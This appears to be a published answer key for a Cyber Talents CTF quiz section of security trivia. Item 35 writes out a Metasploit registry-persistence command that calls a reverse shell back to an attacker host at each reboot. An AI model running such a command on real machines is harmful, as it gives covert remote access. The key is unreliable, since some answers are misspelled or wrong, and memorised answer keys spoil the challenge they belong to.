this is answer sheet for General Information section from Cyber Talents platform


*****
1- Business Gathering
Q: I am a huge cyber security conference that run every year in three places : San Francisco, Singapore and Lately AbuDhabi. Who am I ? No spaces in answering
A: RSAConference
ref: https://www.rsaconference.com/

*****
2- Hackers Gathering
Q: I am a cyber security conference that run in August every year in Las Vegas. I am the largest gathering for Hackers in the whole world. No Credit cards, no online booking , Only Cash allowed . Who am I?
A: Defocn
ref: https://defcon.org/

*****
3- Founder
Q: I have founded two of the most famous Cyber Security conferences across the globe in Las Vegas, USA. I am not The Dark Knight. I am The DarK--------?
A: Tangent
ref: https://en.wikipedia.org/wiki/Jeff_Moss_(hacker)

*****
4- Back to History
Q: am the First Computer Virus ever known . You will find me in your head . My name is ……..?
A: brain
ref: https://en.wikipedia.org/wiki/Brain_(computer_virus)

*****
5- Contribute
Q: I am an Organization that releases the Top 10 Vulnerabilities in Application Security . I am ……?
A: OWASP
ref: https://owasp.org/

*****
6- Greeks
Q: The art of hiding messages or information inside other image / text or data
A:Steganography
ref: https://en.wikipedia.org/wiki/Steganography

*****
7- Robot
Q: A group or network of machines that are controlled by an attacker to do a certain task
A: bot
ref: https://en.wikipedia.org/wiki/Internet_bot

*****
8- Japanese Warrior
Q: I am a linux distrubition with two versions one for Web Penetration Testing and the other for attacking smart grids. What is my smart grid distribution name ?
A: SamuraiSTFU
ref: https://archiveos.org/samuraistfu/

*****
9- Close Look
Q: I am a linux distribution that has many tricks to do packet and traffic analysis. Who am I ?
A: Packetrix

*****
10- Pay Me
Q: I will lock your machine screen or files till you pay me. Who am i ?
A: Ransomware

*****
11- TrendMicro Conference
Q: Periodic Conference in many cities hosted by Trend Micro
A: cloudsec
ref: https://www.cloudsec.com/

*****
12- Intercept
Q: the attacker intercept information between receiver and sender. what is the attack name ?
A: MITM
ref: https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/

*****
13- Modify Code
Q: Change code from one form to another to prevent attacker from understanding it
A: Obfuscation

*****
14- Do you trust senders
Q: Receive malware from a known person. What is the attack type ?
A: spoofing

*****
15- My box
Q: I am a professional pen tester. I do not need to know any information from the customer, I do ....box pen test
A: Black
ref: https://resources.infosecinstitute.com/topic/what-are-black-box-grey-box-and-white-box-penetration-testing/

*****
16- Crash
Q: enter a lot of random trash till the application crash
A: Fuzzing
ref: https://www.contrastsecurity.com/knowledge-hub/glossary/fuzzing

*****
17- Scan
Q: One of the famous, free port scanner. Who am i ?
A: Nmap

*****
18- Capture
Q: Network analysis tool used to captured packets and present it in readable format
A: Wireshark

*****
19- Precious Vulnerability
Q: a security flaw that is not yet known
A: Zeroday

*****
20- SCADA
Q: A worm that targeted SCADA Systems
A: Stuxnet

*****
21- htmlentities
Q: True or False , htmlentities ( convert special characters to its html entity ) can't be exploited to run XSS payload ?
A: false

*****
22- Encoding
Q: What type of this encoded , hashed text "aGVsbG93b3JsZDEx" ?
A: base64

*****
23- Reward
Q: I receive a reward or mentioned on a wall of fame when i found vulnerability . I am participating in ..... program? Format of Flag ( Do not use spaces)
A: bugbounty

*****
24- Hide me
Q: I act as a middle man to forward requests from different devices to access external resources . I am a ......?
A: proxy

*****
25- Cash
Q: I am a type of attacks that used to spread malware. I push data in the cache records of your DNS. I am cache ........?
A: poisoning

*****
26- User Name
Q: He is a user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system.
A: root

*****
27- Crime scene 
Q: Process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime

Flag Format: XXXXXXXXX

A: forensics

*****
28- CVE Number
Q: What is the CVE ID that is related to EternalBlue

Flag Format: XXX-XXXX-XXXX

A: cve-2017-0144

*****
29- one click
Q: Type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts .

A: csrf

*****
30- remove
Q: I need to remove a file called secret in my home directory. which command should i use
A: rm ~/secret

*****
31- Distribution
Q: Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture

The flag without spaces

A: kalilinux

*****
32- security model
Q: is a model designed to guide policies for information security within an organization
A: CIA

*****
33- JPG Magic
Q: You are doing some file analysis and you need to verify the magic byte of JPEG image

Do you know the first 2 bytes of JPEG format 

Flag format: XX XX

A: ff d8

*****
34- Silent Look
Q: Gathering as much information as possible without establishing contact between the pen tester and the target which you are collecting information.

Flag Format: XXXXXXX XXXXXXXXXXX XXXXXXXXX

A: passive information gathering

*****
35- Persistence
Q: You want to achieve persistence using Meterpreter’s persistence module by creating an autorun registry file and getting a shell automatically every time the user restarts the PC

Persistence options 

Minutes after restarting the system: 7 
Your Local port: 1337
Your local host IP: 192.168.0.177
Flag format is: xxx xxxxxxx/xxxxxxx/xxxxx/xxxxxxxx_xxxxxxxxxxx xxxxx_xxxx=xxx  xxxxx=xxxx xxxxx=xxx.xxx.x.xxx

A: run exploit/windows/local/registry_persistence SLEEP_TIME=420 LPORT=1337 LHOST=192.168.0.177

***** 
the end of this section 

